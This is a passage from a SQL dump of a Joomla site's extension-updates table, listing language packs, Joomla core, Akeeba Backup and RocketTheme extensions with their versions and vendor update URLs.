US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19716,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19717,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19718,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19719,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19720,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19721,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19722,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19723,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19724,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19725,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19726,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19727,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19728,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19729,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19730,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19731,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19732,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19733,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19734,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19735,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19736,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19737,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19738,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19739,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19740,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19741,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19742,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19743,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19744,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19745,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19746,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19747,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19748,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19749,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19750,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19751,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19752,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19753,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19754,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19755,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19756,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19757,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19758,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19759,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19760,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19761,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19762,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19763,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19764,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19765,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19766,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19767,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19768,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19769,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19770,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19771,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19772,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19773,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19774,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19775,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19776,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19777,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19778,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19779,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19780,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19781,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19782,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19783,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19784,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19785,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19786,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19787,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19788,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19789,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19790,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19791,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19792,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19793,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19794,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19795,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19796,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19797,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19798,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19799,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19800,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19801,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19802,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19803,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19804,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19805,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19806,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19808,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19809,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19810,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19811,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19812,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19813,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19814,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19815,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19816,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19817,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19818,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19819,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19820,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19821,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19822,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19823,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19824,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19825,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19826,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19827,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19828,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19829,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19830,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19831,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19832,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19833,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19834,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19835,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19836,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19837,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19838,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19839,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19840,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19841,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19842,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19843,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19844,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19845,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19846,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19847,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19848,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19849,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19850,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19851,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19852,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19853,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19854,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19855,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19856,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19857,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19858,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19859,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19860,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19861,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19862,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19863,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19864,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19865,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19866,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19867,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19868,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19869,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19870,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19871,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19872,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19873,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19874,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19875,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19876,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19877,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19878,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19879,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19880,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19881,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19882,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19883,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19884,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19885,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19886,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19887,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19888,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19889,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19890,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19891,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19892,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19893,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19894,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19895,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19896,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19897,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19898,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19899,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19900,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19901,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19902,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19903,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19904,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19905,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19906,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19907,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19908,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19909,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19910,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19911,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19912,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19913,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19914,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19915,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19916,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19917,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19918,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19919,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19920,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19921,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19922,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19923,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19924,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19925,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19926,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19927,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19928,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19929,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19930,20,0,'RokCommon 